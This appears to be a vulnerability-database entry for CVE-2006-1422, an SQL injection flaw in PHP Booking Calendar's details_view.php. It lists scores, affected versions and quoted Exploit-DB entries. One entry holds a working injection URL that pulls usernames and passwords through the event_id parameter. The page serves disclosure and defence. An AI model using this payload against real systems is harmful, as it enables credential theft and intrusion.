CVE-2006-1422
published 2006-03-28CVE-2006-1422: SQL injection vulnerability in details_view.php in PHP Booking Calendar 1.0c and earlier allows remote attackers to execute arbitrary SQL commands via the…
PriorityP430medium5CVSS 2.0
AVNACLAuNCNIPAN
EXPLOIT
EPSS
1.08%
60.8th percentile
SQL injection vulnerability in details_view.php in PHP Booking Calendar 1.0c and earlier allows remote attackers to execute arbitrary SQL commands via the event_id parameter.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| jjwwebdesign | phpbookingcalendar | <= 1.0c | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
phpBookingCalendar 10 d - SQL Injection
exploitdb·2008-05-29
CVE-2006-1422 phpBookingCalendar 10 d - SQL Injection
phpBookingCalendar 10 d - SQL Injection
---
# Portal :PHP Booking Calendar 10 d (sql/upload) Exploit
# Modified 2008
# Download : https://sourceforge.net/project/showfiles.php?group_id=132702
# exploit aported password crypted
########################################
#[*] Founded & Exploited by : Stack
#[*] Contact: Ev!L =>> see down
#[*] Greetz : Houssamix & Djekmani & Jadi & iuoisn & Str0ke & All muslims HaCkeRs :)
################################################################################
# Exploit-DB Note (May 28th 2012)
# PHP Booking Calendar 10e is also affected by this
#
#
#!/usr/bin/perl -w
########################################
# * TITLE: PerlSploit Class
# * REQUIREMENTS: PHP 4 / PHP 5
# * VERSION: v.1
# * LICENSE: GNU General Public License
# * ORIGINAL URL: http://www.
Exploit-DB
phpBookingCalendar 1.0c - 'details_view.php' SQL Injection
exploitdb·2006-03-25
CVE-2006-1422 phpBookingCalendar 1.0c - 'details_view.php' SQL Injection
phpBookingCalendar 1.0c - 'details_view.php' SQL Injection
---
PoC by undefined1_ @ bash-x.net/undef/
phpBookingCalendar <= 1.0c
"A PHP/MySQL Booking Calendar Application."
http://www.jjwdesign.com/booking_calendar.html
phpBookingCalendar is prone to a sql injection attack. the sql injection works regardless of any magic_quotes_gpc settings.
www.site.com/details_view.php?event_id=1 and 1=0 union all select 1,1,username,1,1,1,1,1,1,passwd,1,1,1 from booking_user
# milw0rm.com [2006-03-25]
No writeups or analysis indexed.
2006-03-28
Published